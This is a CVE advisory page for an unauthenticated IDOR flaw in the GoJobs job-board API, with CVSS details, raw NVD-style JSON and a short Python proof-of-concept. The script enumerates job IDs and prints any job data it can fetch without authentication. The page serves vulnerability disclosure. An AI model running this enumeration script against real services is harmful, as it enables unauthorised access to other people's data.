Security Vulnerability Report
CVE-2026-44341 CVSS 5.3 MEDIUM

CVE-2026-44341

Published: 2026-05-12 23:16:18
Last Modified: 2026-05-12 23:16:18

Description

GoJobs is a REST API for a Job Board platform. The application exposes a job retrieval endpoint that allows unauthenticated users to access job details by directly manipulating object identifiers. The endpoint lacks proper authentication and authorization checks, resulting in unauthorized access to job data.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

GoJobs

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def exploit_idor(base_url, start_id=1, end_id=100):
    """
    PoC for CVE-2026-44341: IDOR in GoJobs API.
    Iterates through job IDs to check for unauthorized access.
    """
    print(f"[*] Scanning {base_url} for IDOR vulnerability...")
    for job_id in range(start_id, end_id + 1):
        target_url = f"{base_url.rstrip('/')}/{job_id}"
        try:
            # Send GET request without authentication headers
            response = requests.get(target_url, timeout=5)
            if response.status_code == 200:
                print(f"[+] Success! Job ID {job_id} leaked:")
                print(response.json())
            elif response.status_code == 401:
                print(f"[-] Job ID {job_id} is protected.")
            elif response.status_code == 404:
                pass  # ID might not exist, skip verbose logging
            else:
                print(f"[!] Unexpected status code {response.status_code} for ID {job_id}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Connection error: {e}")


if __name__ == "__main__":
    # Replace with the actual vulnerable endpoint
    target_api = "http://localhost:8080/api/jobs"
    exploit_idor(target_api)

References

https://github.com/karnop/gojobs/security/advisories/GHSA-x2j8-h9xc-wpgf
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-44341",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T23:16:18.197",
    "lastModified": "2026-05-12T23:16:18.197",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "GoJobs is a REST API for a Job Board platform. The application exposes a job retrieval endpoint that allows unauthenticated users to access job details by directly manipulating object identifiers. The endpoint lacks proper authentication and authorization checks, resulting in unauthorized access to job data."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-284"},
          {"lang": "en", "value": "CWE-639"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/karnop/gojobs/security/advisories/GHSA-x2j8-h9xc-wpgf",
        "source": "[email protected]"
      }
    ]
  }
}